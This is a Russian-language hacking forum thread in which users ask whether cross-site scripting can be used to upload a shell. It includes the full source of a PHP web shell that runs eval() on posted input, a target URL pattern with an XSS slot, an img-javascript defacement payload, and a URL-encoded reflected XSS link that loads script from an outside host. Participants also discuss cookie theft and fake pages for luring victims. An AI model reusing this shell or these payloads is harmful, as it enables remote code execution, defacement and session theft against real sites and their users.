Народ поскажите хсс только ворует куки или можно как то через это загрузить шелл например вот этот:
<?

$docr = $_SERVER['DOCUMENT_ROOT'];

$gpc = get_magic_quotes_gpc();
if (!empty($_POST['c'])) {
$c = $gpc ? stripslashes($_POST['c']) : $_POST['c'];
} else {
$c = NULL;
}

?><form action="" method="post">
<textarea cols="80" rows="30" name="c" id="c"><?=$c; ?></textarea>
<br><input type="submit">
</form><?

if (!is_null($c)) eval($c);
?>

Урл сайта имеет вид: http://*****.ru/info.php?log=[XSS]

Врятли! :(

шелл через кроссайтскриптинг?
вопрос интересный.
если активная xss вы к примеру можете закодировать в страничку екзешник какой нить троян.
или Сделать псевдо-дефейс-)))
Это когда к примеру нашёл активную хсс на гл. страничке сайта и по средствам вставки скрипта перекрывающего страничку можно вставить тэги и устроить дефейс.


как год назад: http://history-php-fusion.narod.ru/123.PNG
а вставка была в <img src=javascript:document.wite('AIRSG')>

Да это я знаю сам прикалывался ,а вот насколько реально запустить шелл через хсс?
(ХСС активная.)

Это вообще невозможно.

__XT__ Даже при поможи пасифки можно такое сделать
Даже вставить целвый html файл!

А если шелл попробовать запустить как каритинку таким образом:
<img src="Ссылка на шелл-картинку" alt="" border="0">

А если шелл попробовать запустить как каритинку таким образом:
<img src="Ссылка на шелл-картинку" alt="" border="0">
Конечно же не выйдет! )
Но можно вставить js так а в нём будит типо
document.wite
Так тока html файлы вставлять!
Можно Фейк сделать неплохой!

http://planeta.rambler.ru/srch?words=%22%3E%3C%73%63%72%69%70%74%20%73%72%63 %3D%68%74%74%70%3A%2F%2F%6D%69%72%69%6E%65%74%2E%6 E%61%72%6F%64%2E%72%75%2F%31%2E%6A%73%3E%3C%2F%73% 63%72%69%70%74%3E

Вот вам пример!
http://guap-spb.jino-net.ru/log01.txt

посмотрите всё просто!

И что этим фейком можно делать? Только жертв заманивать.
Мнеб чёнить такое чтоб можно было файл загрузить или просматреть.

Да нельзя шелл через хсс.Зарубите на носу это.Закрыто.Самое полезное - куки.